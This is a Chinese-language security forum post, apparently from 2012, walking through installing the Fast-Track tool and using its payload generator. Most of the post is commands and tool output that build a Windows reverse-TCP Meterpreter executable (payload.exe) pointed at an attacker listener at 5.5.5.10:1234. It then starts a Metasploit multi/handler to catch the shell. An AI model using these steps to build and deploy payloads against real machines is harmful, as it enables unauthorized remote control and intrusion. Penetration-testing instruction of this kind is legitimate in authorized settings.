切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
299 :fasttrack[复制链接]
发表于 2012-10-9 23:59:59 | 显示全部楼层 |!read_mode!
Install
  1. root@Dis9Team:/pen# svn co http://svn.secmaniac.com/fasttrack/ ft
  2. root@Dis9Team:/pen# cd ft/
  3. root@Dis9Team:/pen/ft# python setup.py install
复制代码

注意 到:
Would you like Fast-Track to install Metasploit 3 for you (experimental)? yes or no:
选择 NO
编辑:
  1. root@Dis9Team:/pen/ft/config# cat fasttrack_config
复制代码
METASPLOIT_PATH=/pentest/exploits/framework/  改为你的MSF地址
  1. root@Dis9Team:/pen/ft# python fast-track.py -i
复制代码

启动
    8.  Payload Generator  ==》2. Windows Reverse_TCP Meterpreter
然后选择编码类型
  1. 1. avoid_utf8_tolower
  2.     2. shikata_ga_nai
  3.     3. alpha_mixed
  4.     4. alpha_upper
  5.     5. call4_dword_xor
  6.     6. countdown
  7.     7. fnstenv_mov
  8.     8. jmp_call_additive
  9.     9. nonalpha
  10.     10. nonupper
  11.     11. unicode_mixed
  12.     12. unicode_upper
  13.     13. alpha2
  14.     14. No Encoding
复制代码
继续
  1. Enter your choice : 14

  2.     Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 5.5.5.10
  3.     Enter the port of the Listener: 1234

  4.     Do you want to create an EXE or Shellcode

  5.     1. Executable
  6.     2. Shellcode

  7.     Enter your choice: 1
复制代码

生成:
  1. root@Dis9Team:/pen/ft# file payload.exe
  2. payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
  3. root@Dis9Team:/pen/ft#
复制代码

并且启动了监听
  1. Created by msfpayload (http://www.metasploit.com).
  2. Payload: windows/meterpreter/reverse_tcp
  3. Length: 290
  4. Options: {"LHOST"=>"5.5.5.10", "LPORT"=>"1234"}


  5.     A payload has been created in this directory and is named 'payload.exe'. Enjoy!


  6.     Do you want to start a listener to receive the payload yes or no: yes

  7.     Launching Listener...
  8. ***********************************************************************************************

  9.     Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
  10. Listening on IP: 5.5.5.10 on Local Port: 1234 Using encoding:

  11. ***********************************************************************************************
复制代码






操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 03:14

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部